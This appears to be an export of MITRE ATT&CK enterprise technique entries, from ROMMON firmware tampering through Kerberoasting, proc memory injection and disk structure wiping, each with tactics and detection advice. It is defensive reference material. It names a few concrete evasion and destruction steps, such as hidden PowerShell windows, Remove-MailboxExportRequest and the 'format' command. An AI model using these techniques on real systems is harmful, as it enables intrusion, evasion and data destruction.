ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect. | 20 October 2020 | enterprise-attack | Defense Evasion, Persistence | There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation. |
T1602.002 | Data from Configuration Repository: Network Device Configuration Dump | Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. | 20 October 2020 | enterprise-attack | Collection | Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018) |
T1587 | Develop Capabilities | Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability. | 01 October 2020 | enterprise-attack | Resource Development | Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control. |
T1556.009 | Modify Authentication Process: Conditional Access Policies | Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.
For example, in Azure AD, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required.
By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures. | 02 January 2024 | enterprise-attack | Credential Access, Defense Evasion, Persistence | null |
T1070.008 | Indicator Removal: Clear Mailbox Data | Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.
Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code> or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)
Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022) | 08 July 2022 | enterprise-attack | Defense Evasion | null |
T1564 | Hide Artifacts | Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) | 26 February 2020 | enterprise-attack | Defense Evasion | Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage. |
T1574.014 | Hijack Execution Flow: AppDomainManager | Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains)
Known as "AppDomainManager injection," adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection) | 28 March 2024 | enterprise-attack | Defense Evasion, Persistence, Privilege Escalation | null |
T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting | Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015)
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) | 11 February 2020 | enterprise-attack | Credential Access | Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015) |
T1137.006 | Office Application Startup: Add-ins | Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. | 07 November 2019 | enterprise-attack | Persistence | Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior |
T1564.003 | Hide Artifacts: Hidden Window | Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)
On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>.(Citation: PowerShell About 2019)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding <code>explorer.exe</code> process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows. | 13 March 2020 | enterprise-attack | Defense Evasion | Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the <code>apple.awt.UIElement</code> or any other suspicious plist tag in plist files and flag them. |
T1608 | Stage Capabilities | Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)
Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) | 17 March 2021 | enterprise-attack | Resource Development | If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors. |
T1055.009 | Process Injection: Proc Memory | Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.
Proc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man)
Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. | 14 January 2020 | enterprise-attack | Defense Evasion, Privilege Escalation | File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases.
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. |
T1561.002 | Disk Wipe: Disk Structure Wipe | Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
On a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) | 20 February 2020 | enterprise-attack | Impact | Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the <code>\\\\.\\</code> notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.
For network infrastructure devices, collect AAA logging to monitor for `format` commands being run to erase the file structure and prevent recovery of the device. |